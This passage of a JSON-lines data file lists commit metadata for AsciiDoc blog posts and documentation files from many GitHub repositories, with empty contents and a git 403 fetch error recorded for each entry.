2016-04-19-N-I-X-porn.adoc","repos":"pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io,pyxozjhi\/pyxozjhi.github.io","old_file":"_posts\/2016-04-19-N-I-X-porn.adoc","new_file":"_posts\/2016-04-19-N-I-X-porn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pyxozjhi\/pyxozjhi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5dc02d4de69a090f0564385a0803d42269f252a2","subject":"Update 2016-02-04-Inception.adoc","message":"Update 2016-02-04-Inception.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-Inception.adoc","new_file":"_posts\/2016-02-04-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ec6526c108769c42bb62dbcaacf2cd0bfdfd943","subject":"Update 2016-10-03-Animation.adoc","message":"Update 
2016-10-03-Animation.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-03-Animation.adoc","new_file":"_posts\/2016-10-03-Animation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eb9ab8c5b837d8d1bc64c701fce989b54c7ab5b","subject":"Update 2018-08-30-Exception.adoc","message":"Update 2018-08-30-Exception.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-30-Exception.adoc","new_file":"_posts\/2018-08-30-Exception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7447c7a4c1da182bf6286e3c361526a8057d3c9b","subject":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","message":"Update 2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_file":"_posts\/2015-10-05-Inject-Trek-je-applicatie-strak-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"068dd73007e653bceac08bdea68709565cb5e6a2","subject":"Delete the file at '_posts\/2019-06-16-mind-fuck.adoc'","message":"Delete the file at '_posts\/2019-06-16-mind-fuck.adoc'","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2019-06-16-mind-fuck.adoc","new_file":"_posts\/2019-06-16-mind-fuck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfa4a87b45fef11cd916a6c4ccd5d590c558d831","subject":"y2b create post OFFICIAL: Xbox One will support used games!","message":"y2b create post OFFICIAL: Xbox One will support used games!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-20-OFFICIAL-Xbox-One-will-support-used-games.adoc","new_file":"_posts\/2013-06-20-OFFICIAL-Xbox-One-will-support-used-games.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a133f70a40f13cc4e0dbf268410ad93c43478e2e","subject":"Update 2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","message":"Update 
2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidor-de-Aula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30b2fd22069cf76066dcc57c92a63b565b501efd","subject":"Update 2016-09-12-Rhizosphere-metatranscriptome-analysis-1n.adoc","message":"Update 2016-09-12-Rhizosphere-metatranscriptome-analysis-1n.adoc","repos":"jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io,jonathandmoore\/jonathandmoore.github.io","old_file":"_posts\/2016-09-12-Rhizosphere-metatranscriptome-analysis-1n.adoc","new_file":"_posts\/2016-09-12-Rhizosphere-metatranscriptome-analysis-1n.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jonathandmoore\/jonathandmoore.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a31e9393442fd7474ebd89dcd6659d6c03b5e8b0","subject":"Update 2015-05-04-New-post-1.adoc","message":"Update 2015-05-04-New-post-1.adoc","repos":"niole\/niole.github.io,niole\/niole.github.io,niole\/niole.github.io","old_file":"_posts\/2015-05-04-New-post-1.adoc","new_file":"_posts\/2015-05-04-New-post-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/niole\/niole.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bc904a4409b4ba5192688f0d2742942d3d7d3cb5","subject":"Update 2017-03-24-First-Post.adoc","message":"Update 2017-03-24-First-Post.adoc","repos":"dfjs\/dfjs.github.io,dfjs\/dfjs.github.io,dfjs\/dfjs.github.io,dfjs\/dfjs.github.io","old_file":"_posts\/2017-03-24-First-Post.adoc","new_file":"_posts\/2017-03-24-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dfjs\/dfjs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66fd73070863231ef6dba2202078209acbe0e5ea","subject":"added the upgrade doc for 3.2.0 and added a section about GraphFilter and the two new GraphComputer methods. CTR.","message":"added the upgrade doc for 3.2.0 and added a section about GraphFilter and the two new GraphComputer methods. 
CTR.\n","repos":"robertdale\/tinkerpop,pluradj\/incubator-tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,jorgebay\/tinkerpop,BrynCooke\/incubator-tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,artem-aliev\/tinkerpop,artem-aliev\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,BrynCooke\/incubator-tinkerpop,apache\/tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,apache\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,krlohnes\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,robertdale\/tinkerpop,BrynCooke\/incubator-tinkerpop,robertdale\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,apache\/tinkerpop,apache\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,krlohnes\/tinkerpop,velo\/incubator-tinkerpop,newkek\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,robertdale\/tinkerpop,newkek\/incubator-tinkerpop,newkek\/incubator-tinkerpop,krlohnes\/tinkerpop,velo\/incubator-tinkerpop,velo\/incubator-tinkerpop,apache\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,krlohnes\/tinkerpop,jorgebay\/tinkerpop,RussellSpitzer\/incubator-tinkerpop,pluradj\/incubator-tinkerpop","old_file":"docs\/src\/upgrade\/release-3.2.x-incubating.asciidoc","new_file":"docs\/src\/upgrade\/release-3.2.x-incubating.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/incubator-tinkerpop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4d5f21085626d0dfe9888a13e89003bba61f44f","subject":"userguide: add invoice subsystem manual","message":"userguide: add invoice subsystem manual\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/invoice_subsystem.adoc","new_file":"userguide\/tutorials\/invoice_subsystem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"65af3f552c5f4e49ac38d7ede77c1e628a5028ca","subject":"y2b create post Sony Personal 3D Viewer Unboxing \\u0026 First Look","message":"y2b create post Sony Personal 3D Viewer Unboxing \\u0026 First Look","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-18-Sony-Personal-3D-Viewer-Unboxing-u0026-First-Look.adoc","new_file":"_posts\/2012-01-18-Sony-Personal-3D-Viewer-Unboxing-u0026-First-Look.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b3015095e09e16fffdbf634021af220c1eb0853","subject":"Update 2015-06-12-Questioning-Privacy-through-Public-Personal-Email.adoc","message":"Update 
2015-06-12-Questioning-Privacy-through-Public-Personal-Email.adoc","repos":"esbrannon\/esbrannon.github.io,esbrannon\/esbrannon.github.io,esbrannon\/esbrannon.github.io","old_file":"_posts\/2015-06-12-Questioning-Privacy-through-Public-Personal-Email.adoc","new_file":"_posts\/2015-06-12-Questioning-Privacy-through-Public-Personal-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/esbrannon\/esbrannon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11cdd511f13213dfdb854577f0e08097dc9d84f9","subject":"Update 2015-05-01-Guten-Tag.adoc","message":"Update 2015-05-01-Guten-Tag.adoc","repos":"sonyl\/sonyl.github.io,sonyl\/sonyl.github.io,sonyl\/sonyl.github.io","old_file":"_posts\/2015-05-01-Guten-Tag.adoc","new_file":"_posts\/2015-05-01-Guten-Tag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sonyl\/sonyl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef9adb664bb28daedc64d9f551ba25c2b38785b","subject":"Update 2015-06-11-Fireworks.adoc","message":"Update 2015-06-11-Fireworks.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-Fireworks.adoc","new_file":"_posts\/2015-06-11-Fireworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"69a6516c1c922c0626d7d49f21c2d812eb88fe4e","subject":"README.adoc for controlled_ctor_dtor","message":"README.adoc for controlled_ctor_dtor\n","repos":"ajneu\/cpp_experiments","old_file":"controlled_ctor_dtor\/README.adoc","new_file":"controlled_ctor_dtor\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/cpp_experiments.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"734b9641a3130f689b244f844f36be84aadf5ed8","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76a56ee44ae10f9e21a38386e812146db4d47ce4","subject":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","message":"Update 2016-04-16-google-analytics-with-google-apps-script2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_file":"_posts\/2016-04-16-google-analytics-with-google-apps-script2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The 
requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19426326879c97e67242c6b1f474a0598429d8cd","subject":"y2b create post BulletTrain Express First Look CES 2012","message":"y2b create post BulletTrain Express First Look CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-14-BulletTrain-Express-First-Look-CES-2012.adoc","new_file":"_posts\/2012-01-14-BulletTrain-Express-First-Look-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc838656d3a386309e1aea7be82fc0d7a3de7ba3","subject":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","message":"Update 2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_file":"_posts\/2013-12-09-Der-Email-Verteiler-der-Linux-User-Group-Oldenburg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3304ee7e8d5f7dd6f6504b9f9787e22b22609e33","subject":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d13000820917d7c3dc7065984ed7e75c1031eb82","subject":"Update 2012-10-24-A-Makefile-for-the-simplest-shared-library.adoc","message":"Update 2012-10-24-A-Makefile-for-the-simplest-shared-library.adoc","repos":"codechunks\/codechunks.github.io,codechunks\/codechunks.github.io,codechunks\/codechunks.github.io,codechunks\/codechunks.github.io","old_file":"_posts\/2012-10-24-A-Makefile-for-the-simplest-shared-library.adoc","new_file":"_posts\/2012-10-24-A-Makefile-for-the-simplest-shared-library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codechunks\/codechunks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f867df6825a9920757fe51dfbdd97afaa39a8d0f","subject":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","message":"Update 2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_file":"_posts\/2015-08-24-And-yet-another-RStatisticsWhatsoever-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9affd720d30265d0f06adb915df03eac39654065","subject":"Update 2016-01-18-LTSP-Images-servidas-por-Servidore-de-Aula.adoc","message":"Update 2016-01-18-LTSP-Images-servidas-por-Servidore-de-Aula.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidore-de-Aula.adoc","new_file":"_posts\/2016-01-18-LTSP-Images-servidas-por-Servidore-de-Aula.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22192646006a7b19a4328dc33d3116ec87139f1a","subject":"Introduce \"Release Notes\" template","message":"Introduce \"Release Notes\" template\n","repos":"junit-team\/junit-lambda,sbrannen\/junit-lambda","old_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-TEMPLATE.adoc","new_file":"documentation\/src\/docs\/asciidoc\/release-notes\/release-notes-TEMPLATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sbrannen\/junit-lambda.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"cdf06ff5d000db3ff73330ebc11f2b79b768bec7","subject":"Update 2016-04-04-Readability-of-Code.adoc","message":"Update 2016-04-04-Readability-of-Code.adoc","repos":"metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io,metasean\/blog,metasean\/hubpress.io,metasean\/blog","old_file":"_posts\/2016-04-04-Readability-of-Code.adoc","new_file":"_posts\/2016-04-04-Readability-of-Code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f0fdea67ff8b84c2745afa90f8977025dfac231","subject":"Update 2018-02-27-When-the-RTFM-sucks.adoc","message":"Update 2018-02-27-When-the-RTFM-sucks.adoc","repos":"costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io,costalfy\/costalfy.github.io","old_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_file":"_posts\/2018-02-27-When-the-RTFM-sucks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/costalfy\/costalfy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ede0f8388f42c2b1a26c0f660b5cfe0ae2f2dfe","subject":"Update 2015-11-05-improve-your-java-environment-with-docker.adoc","message":"Update 2015-11-05-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2015-11-05-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbf5dac5c0893f17a96c14f062e19892c4ccd8d3","subject":"Update 2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","message":"Update 
2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_file":"_posts\/2015-12-14-treat-your-pom-the-same-as-your-java-code.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9d3af2cd52c6f7e4ecf44973248840455c5bf98","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23fdc5eaa3f27c0210df7b480581ab7e4c1d807e","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26570401e53de4d87ea2ce333932167bdb45582b","subject":"README","message":"README\n","repos":"eee-c\/dart-comics,eee-c\/dart-comics,eee-c\/dart-comics","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eee-c\/dart-comics.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d31c8c4bd1f310aed98acff8e5dc965ff4f385d","subject":"y2b create post 3 Cool Tech Deals - #7","message":"y2b create post 3 Cool Tech Deals - #7","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-25-3-Cool-Tech-Deals--7.adoc","new_file":"_posts\/2015-08-25-3-Cool-Tech-Deals--7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"340dfd0cccc18a9e7e1adef8a6493443b1b50a5b","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 
2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4f6c2c51da1c913a3c65b7ed207b609048b173d","subject":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","message":"Update 2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_file":"_posts\/2017-12-31-Discourse-as-a-killer-community-discussion-software.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7fe04847ce0c5237466742095013dc12f9581db4","subject":"Initial proposal on resource definitions","message":"Initial proposal on resource definitions\n","repos":"jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design_docs\/design\/resource-definitions.adoc","new_file":"documentation\/design_docs\/design\/resource-definitions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2cdccda89c9e2d7f5b7b5a57f82e7f3ba4e2651c","subject":"Update 2015-05-17-Leonardo-da-Gerti.adoc","message":"Update 2015-05-17-Leonardo-da-Gerti.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_file":"_posts\/2015-05-17-Leonardo-da-Gerti.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5377ccfb13584d30eb69cd46b4a0dd713489113","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"485a4797d77cf2546365908d84517c3a67d0bbcc","subject":"Update 2015-12-28-AirHacX-Tracking-Unit.adoc","message":"Update 
2015-12-28-AirHacX-Tracking-Unit.adoc","repos":"AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com,AirHacX\/blog.airhacx.com","old_file":"_posts\/2015-12-28-AirHacX-Tracking-Unit.adoc","new_file":"_posts\/2015-12-28-AirHacX-Tracking-Unit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AirHacX\/blog.airhacx.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3835e417dd0380e87bb4d1524ec5bf96e721b9de","subject":"y2b create post Massive 100-inch Laser TV -- LG HECTO (CES 2013)","message":"y2b create post Massive 100-inch Laser TV -- LG HECTO (CES 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-10-Massive-100inch-Laser-TV--LG-HECTO-CES-2013.adoc","new_file":"_posts\/2013-01-10-Massive-100inch-Laser-TV--LG-HECTO-CES-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bbd94eac86eb987766b62bd8904bc8adb1142b8","subject":"Update 2014-11-08-Creating-a-Custom-Gradle-Tooling-API-Model.adoc","message":"Update 